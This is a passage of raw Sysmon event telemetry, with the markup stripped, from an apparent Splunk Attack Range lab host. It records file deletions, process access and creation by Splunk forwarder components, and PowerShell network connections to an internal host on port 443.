Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=883FA66FF8DB1755AE1546B5AA64DB2D,SHA256=F68A474C2B94CA7D52CCBEEBA4A73DDCF3AAF16C8BDEF3470F2D8C4E0C239CAF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497776Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:15.691{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A92BDE222BCE01A901AC2B7EFD6B0CC7,SHA256=B071B25F92E6CABE36B89778CF9E07CCCDDFCA9B5AD8DC0C0063694D28D0FCAA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497775Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:45.391{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50577-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497777Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:16.706{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D5D53C864BFBAA38D8F24E16A3758A1,SHA256=A68E60B224A6A3D223AB839FBC7B7CDF9B850F7879518C79FA50AA6B5A0417F8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497779Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:17.723{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70648DC4A207881CCA0F99175C501288,SHA256=ADF1621FFFC73DEE36537F8430B9727FEF77E3D25D7555D6E791519836D27CE2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497778Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:47.844{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50578-false10.0.1.12-8000- 23542300x800000000000000036497781Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:18.942{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CA4EA046C22CCDFD1851F6C3C97D3951,SHA256=138FCAEBBE4EF1403A32AE48E9E3B1DC5413CC4BAFD887434F9EBE52D9C39715,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497780Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:18.757{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F88BE64DB15F88C309CE1473F8665A4D,SHA256=A3BEC3A76D51573845097976C617E79876CEAC29452B672D2D864E9E143823BD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497782Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:19.788{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AEDB44BFB0EAF439CE072BAEFA032A4,SHA256=60AD6BBB27D39DEE6F02CA7FB16BE620D65018FC9DFA50B30B89C620EFED5281,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497784Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:20.802{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A5579B58FA29E6B9F3328D5A6D0C503,SHA256=231997D86AD2B7279175B8ACBBE26A7EB6592001FE62E5C011CD1BA878B7BBCA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497783Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:49.406{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50579-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497785Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:21.820{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E0BD08034047CE47105E92621318AA7,SHA256=C263F4CFAB24DCF9E68B5DAA164CACEE93FF591DBED1E8FAB0AC02C08F0D9161,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497788Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:22.823{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0FC698FC24E686B41D0C38FB31734C3,SHA256=D5D91B72353580B43F28541D68766618FC687A0729ECD30CB1939A61ACE2E138,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497787Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:22.805{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A2197D4981D2CED434772DAACDCCBB84,SHA256=E32BF0BCB549788F2BEA3A3CA2473FC06A59D025FF8B634CF246A9FB10AFCE84,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497786Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:52.888{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50580-false10.0.1.12-8000- 23542300x800000000000000036497790Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:23.857{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E02D183C40A0189A28C68716A4A9611,SHA256=5C2EC10EAA661094D931980AB681187954FFA390AB0377FB142156920D6B36D3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497789Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:23.258{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=B5C13A70B1D118A098C6C16EBD18D9DC,SHA256=EB91CAAB46DDB508B39821FF971DD52529CA75B7F9FD5A708B2A11FB4B7D1904,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497809Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:24.940{B81B27B7-A15C-6140-9056-04000000C801}66046928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036497808Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:24.871{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=589F769679A38FC148550ADFDA5328AA,SHA256=833777D038BF51ECC73CD35595077DA674CB73F67B86A8DD4786D5899AAA39E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497807Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:24.787{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A15C-6140-9056-04000000C801}6604C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497806Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:24.787{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497805Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:24.787{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497804Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:24.787{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497803Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:24.787{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497802Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:24.787{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A15C-6140-9056-04000000C801}6604C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497801Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:24.787{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A15C-6140-9056-04000000C801}6604C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497800Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:24.772{B81B27B7-A15C-6140-9056-04000000C801}6604C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000036497799Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:53.425{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50581-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000036497798Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:24.088{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A15C-6140-8F56-04000000C801}4276C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497797Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:24.088{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497796Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:24.088{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497795Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:24.088{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497794Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:24.088{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497793Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:24.088{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A15C-6140-8F56-04000000C801}4276C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497792Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:24.088{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A15C-6140-8F56-04000000C801}4276C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497791Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:24.073{B81B27B7-A15C-6140-8F56-04000000C801}4276C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497812Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:25.887{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FA43F96691E226D4ED048338765C874,SHA256=447F42F9E306E21FD9191406D265C5FDC69912D898510B5256F419C027669ACD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497811Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:25.073{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=015DDB324B7D6FEC05ED8CE29FACCC99,SHA256=15718DDDC8A753803247D3DE9071977FDADBD6440B7AA10E79C6457B3F63DFE2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497810Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:25.073{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D2A179B79A417E69A3AE4E484E058C20,SHA256=0B5747B28ECDB9FE23BFE8488304D7317E49CF2B7F77295FB3970AEC63681A8F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497813Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:26.902{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 